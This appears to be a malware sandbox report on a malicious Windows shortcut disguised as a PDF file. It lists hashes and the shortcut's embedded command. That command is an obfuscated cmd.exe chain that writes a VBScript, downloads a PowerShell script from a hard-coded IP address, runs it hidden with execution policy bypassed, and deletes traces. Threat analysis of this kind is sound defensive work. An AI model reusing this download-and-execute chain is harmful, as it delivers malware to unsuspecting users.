Characteristics
Hash | Hash Value
MD5 | b4d06cd0060be0aab67bace081f5606d
Sha1 | 72508dfd4052ef09bef8bbe084dcb7b3cb3ef527
Sha256 | e1db60a7cf4bfef5fe8cc9706d6fa707228fcce1c9ed442a6cbdcecb9d66374d
Sha384 | acfbb4cc089d27727d11a468be6a31532d1949bc2be84a0deaecfc36e97471c3a3c2f509982eba599dba82955f01e528
Sha512 | 6a62922530f21e016d519c689e0f0ee0c68476730c9fc636990fa588e8ba69d716f65e6f04e154aa3d931658fcee1ca97daea85bb48f4cb0a9fc2b6636eff86f
SSDeep | 24:8d/2fnyf1SiXnSpVT6hCg8Bxb1En92M9RrTU:8l2fnydXnSpEUZb1U28
TLSH | 8593AC8165FC0304F2F6BE35DA3A6B82093BB9D0ED72C75C8D948C0D1920A56ED72F66
Artefacts
Name
Value
LNK: Command Execution

cmd.exe /v /c "set "a=&" && set "v1=MSXM" && set "v2=L2.XML" && set "o1=ADOD" && set "o2=B.S" && echo Set h=CreateObject("!v1!" ^!a! "!v2!HTTP"):h.open "GET","http://193.169.194.40/S7yhd67/madlybibliography.ps1",False:h.setRequestHeader "User-Agent","UA WindowsPowerShell":h.send:Set b=CreateObject("!o1!" ^!a! "!o2!tream"):b.Type=1:b.Open:b.Write h.responseBody:b.SaveToFile "%TEMP%\VCdjhY.ps1",2 > %TEMP%\vhiO.vbs && cscript //b %TEMP%\vhiO.vbs && powershell -NoP -W Hidden -ExecutionPolicy Bypass -File %TEMP%\VCdjhY.ps1 & del %TEMP%\vhiO.vbs"

URLs in VB Code - #1

http://193.169.194.40/S7yhd67/madlybibliography.ps1

Deobfuscated PowerShell

& Remove-Item "%TEMP%\vhiO.vbs"

Deobfuscated PowerShell

& Remove-Item "%TEMP%\vhiO.vbs IconLocation: imageres.dll"

Gorschenuk_Vechernie_Zapiski.pdf.lnk (94.14 KB)